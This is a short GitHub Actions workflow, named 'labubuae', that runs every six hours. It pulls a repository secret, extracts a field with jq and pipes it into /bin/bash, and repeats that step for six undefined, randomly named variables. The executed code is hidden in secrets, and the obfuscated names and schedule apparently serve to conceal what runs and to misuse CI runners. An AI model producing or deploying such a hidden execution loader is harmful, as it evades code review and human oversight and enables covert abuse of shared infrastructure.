name: labubuae

on:
  workflow_dispatch:
  schedule:
    - cron: '52 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: labubuae
        env:
          y362: ${{ secrets.y362 }}
        run: |
          echo $y362 | jq -r .y64374 | /bin/bash
          echo $g79 | jq -r .fvkst12 | /bin/bash
          echo $gyqrn26643 | jq -r .prcjo41376 | /bin/bash
          echo $fwqon00 | jq -r .ua58059 | /bin/bash
          echo $s5 | jq -r .xrwr684 | /bin/bash
          echo $pvai329 | jq -r .ltlrq46148 | /bin/bash
          echo $m3762 | jq -r .zxpv2879 | /bin/bash

